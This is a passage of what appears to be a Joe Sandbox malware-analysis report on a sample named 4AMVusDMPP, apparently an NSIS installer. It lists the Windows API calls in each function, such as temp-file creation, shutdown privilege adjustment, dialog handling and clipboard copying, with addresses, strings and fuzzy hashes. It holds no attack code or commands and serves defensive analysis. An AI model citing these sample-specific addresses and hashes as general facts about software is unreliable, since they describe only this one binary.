                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                          • ExitProcess.KERNEL32 ref: 0040383A
                                                          • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                          • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                          • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                          • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                          • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                          • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                          • ExitProcess.KERNEL32 ref: 004039E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                          • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 3441113951-334447862
                                                          • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                          • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                          • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                          • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                          • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                          • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                          • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                          • GlobalFree.KERNEL32(?), ref: 004051FC
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                          • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                          • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                          • ShowWindow.USER32(00000000), ref: 004053AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                          • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                          • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                          • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,00437800,774D2EE0,00000000), ref: 00405B23
                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405B6B
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405B8E
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405B94
                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405BA4
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                          • FindClose.KERNEL32(00000000), ref: 00405C53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: 0WB$\*.*
                                                          • API String ID: 2035342205-351390296
                                                          • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                          • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                          • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                          • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                          • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                          • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                          • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0), ref: 00406736
                                                          • FindClose.KERNEL32(00000000), ref: 00406742
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: xgB
                                                          • API String ID: 2295610775-399326502
                                                          • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                          • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                          • GetClientRect.USER32(?,?), ref: 00405639
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                          • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                            • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                          • ShowWindow.USER32(00000000), ref: 00405788
                                                          • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                          • ShowWindow.USER32(00000008), ref: 004057D7
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                          • CreatePopupMenu.USER32 ref: 0040581C
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                          • GetWindowRect.USER32(?,?), ref: 00405850
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                          • OpenClipboard.USER32(00000000), ref: 004058B1
                                                          • EmptyClipboard.USER32 ref: 004058B7
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                          • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                          • CloseClipboard.USER32 ref: 00405912
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: (7B${
                                                          • API String ID: 590372296-525222780
                                                          • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                          • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                          • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                          • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                          • ShowWindow.USER32(?), ref: 00403EDF
                                                          • DestroyWindow.USER32 ref: 00403EF3
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                          • GetDlgItem.USER32(?,?), ref: 00403F30
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                          • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                          • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                          • ShowWindow.USER32(00000000,?), ref: 00404135
                                                          • EnableWindow.USER32(?,?), ref: 00404147
                                                          • EnableWindow.USER32(?,?), ref: 00404162
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                          • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                          • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                          • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: (7B
                                                          • API String ID: 184305955-3251261122
                                                          • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                          • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                          • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                          • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                          APIs
                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                          • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,774D3420,00435000,00000000), ref: 00403B59
                                                          • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                          • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                          • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                            • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                          • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                          • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                          • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-1425696872
                                                          • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                          • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                          • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                          • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                          • GetSysColor.USER32(?), ref: 004045FE
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                          • lstrlenW.KERNEL32(?), ref: 0040461F
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                          • SendMessageW.USER32(00000000), ref: 004046A1
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                          • SetCursor.USER32(00000000), ref: 00404720
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                          • SetCursor.USER32(00000000), ref: 0040473C
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: N
                                                          • API String ID: 3103080414-1130791706
                                                          • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                          • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                          • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                          • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                          • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                          • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                          • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                            • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                            • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                            • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                            • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                            • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
